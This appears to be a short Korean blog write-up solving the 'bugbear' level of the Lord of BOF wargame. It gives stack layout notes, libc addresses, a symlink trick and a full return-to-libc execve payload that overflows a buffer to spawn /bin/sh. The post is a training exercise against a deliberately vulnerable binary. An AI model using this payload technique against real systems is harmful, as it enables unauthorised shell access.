bugbear - RTL2
stack : *ret[4] + *execve_addr[4] + *execve_offset[4] + *lib_addr[4] + *fp[4] + buffer[40] + sfp[4] + ret[4]1
execve : 0x400a9d48
exit : 0x400391e0
evecve(filename, *argv[], 0) -> execve("/bin/sh", &"/bin/sh", \x00, &NULL)
Symbolic Link : ln -s giant `python -c 'print "\xf9\xbf\x0f\x40"'` (address of "/bin/sh")
"/bin/sh" : 0x400fbff9
&"/bin/sh", \x00 : 0xbffffff7
&NULL : 0xbffffffc
Payload : ./`python -c 'print "\xf9\xbf\x0f\x40"'` "`python -c 'print "A"*44 + "\x48\x9d\x0a\x40" + "\xe0\x91\x03\x40" + "\xf9\xbf\x0f\x40" + "\xf7\xff\xff\xbf" + "\xfc\xff\xff\xbf"'`"
Using RTL_execve
'Wargames > Load Of BOF' 카테고리의 다른 글
| LOB Redhat 6.2 - assassin (0) | 2015.10.30 |
|---|---|
| LOB Redhat 6.2 - giant (0) | 2015.10.30 |
| LOB Redhat 6.2 - darkknight (0) | 2015.10.29 |
| LOB Redhat 6.2 - golem (0) | 2015.10.29 |
| LOB Redhat 6.2 - skeleton (0) | 2015.10.24 |
